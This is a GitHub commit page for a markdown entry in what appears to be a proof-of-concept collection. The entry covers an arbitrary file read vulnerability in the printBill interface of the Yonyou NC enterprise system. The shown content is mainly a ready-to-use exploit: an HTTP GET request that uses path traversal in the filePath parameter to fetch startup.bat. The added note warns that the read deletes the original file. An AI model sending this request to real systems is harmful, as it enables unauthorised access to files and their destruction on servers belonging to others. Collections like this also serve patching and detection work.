Update 用友NC系统printBill接口存在任意文件读取漏洞.md

This commit is contained in:
wy876 2024-05-16 21:53:48 +08:00 committed by GitHub
parent 75c0249e6f
commit 43615adcb3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -1,5 +1,7 @@
## 用友NC系统printBill接口存在任意文件读取漏洞
`注意:这个漏洞在读取文件的时候,会将原来的文件删除,谨慎使用。`
## poc
```
GET /portal/pt/printpdf/printBill?pageId=login&filePath=../../startup.bat HTTP/1.1